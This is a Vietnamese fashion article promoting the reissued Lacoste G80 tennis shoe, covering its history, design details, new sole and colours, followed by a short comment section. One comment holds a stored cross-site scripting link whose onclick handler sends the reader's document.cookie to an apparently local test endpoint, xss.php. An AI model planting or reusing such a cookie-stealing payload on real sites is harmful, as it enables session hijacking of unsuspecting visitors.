LACOSTE G80 – Sự tái hiện hoàn hảo của những giá trị vượt thời gian

07/09/2020

Cuối mùa hè năm nay, LACOSTE làm tái sinh một số mẫu giày mang tính biểu tượng của quần vợt, và G80 - mẫu giày được ra đời từ năm 1987 là một trong số đó.

Mục đích ban đầu của sản phẩm là chuyên phục vụ cho những người chơi quần vợt chuyên nghiệp hoặc chơi thể thao trên những bề mặt cứng, nhưng sự trở lại của G80 lần này được Lacoste thay đổi để phù hợp hơn với phong cách thành thị. Một sự phối hợp hài hòa giữa cảm hứng từ ký ức của những năm 80 và tinh thần cổ điển, sự ra mắt của G80 hoàn toàn phù hợp với xu hướng thẩm mỹ thời trang hiện tại, vừa tuân thủ được quy chuẩn kỹ thuật của ngày trước vừa thể hiện được phong cách thời trang ngày nay.

Trung thành với những đường nét thiết kế ban đầu, G80 vẫn giữ được tính đặc trưng của thương hiệu, thể hiện thông qua phần nhãn dệt “Lacoste Sport” tại lưỡi giày, một phần đế bên trong được in toàn bộ hình chữ L, logo Cá Sấu được đặt ở một gốc tư của giày và kèm theo phần thẻ tag ấn tượng được đính kèm trên bề mặt giày. Màu trắng tinh khiết của phần lưới bên trên tương phản với các phần da màu trắng tạo nên nét thanh lịch đặc biệt.

G80 của hiện tại thể hiện một phiên bản mới và chỉ mang duy nhất một sự thay đổi: đó chính là phần đế giày được thiết kế lại để cải thiện độ bám của sản phẩm. Các chi tiết còn lại, toàn bộ vẫn gắn liền với những thiết kế ban đầu, những đường nét cổ điển của trong thiết kế của đôi giày G80 biểu đạt rõ nét ý đồ của nhà thiết kế với mong muốn thể hiện sự trường tồn theo thời gian của sản phẩm. G80 khoác lên mình những tông màu cổ điển như xanh nước biển, xanh lá cây, hồng nhạt và trắng.

Đặc biệt qua lần tái hiện này, G80 xuất hiện phiên bản màu trắng được tô điểm bằng viền đỏ bao quanh đầy thời thượng và thanh lịch, tạo điểm nhấn độc đáo cho toàn bộ sưu tập lần này.

Danh Giá Fashion tự hào là đơn vị phân phối độc quyền của nhãn hàng thời trang Lacoste tại Việt Nam.

Bình luận

Bạn nghĩ gì về bài viết này ?(1 bình luận)

Bạn cần đăng nhập để có thể bình luận

Có 1 thành viên đã bình luận

Đào Thanh Hiền

Đào Thanh Hiền

hi

Đào Thanh Hiền

Đào Thanh Hiền

<a href="#" onclick="javascript:window.location='http://127.0.0.1:8081/Tester/xss.php?cok='+document.cookie+'&url=https://www.lofficiel.vn/';" >Click vào đây để xem chi tiết</a>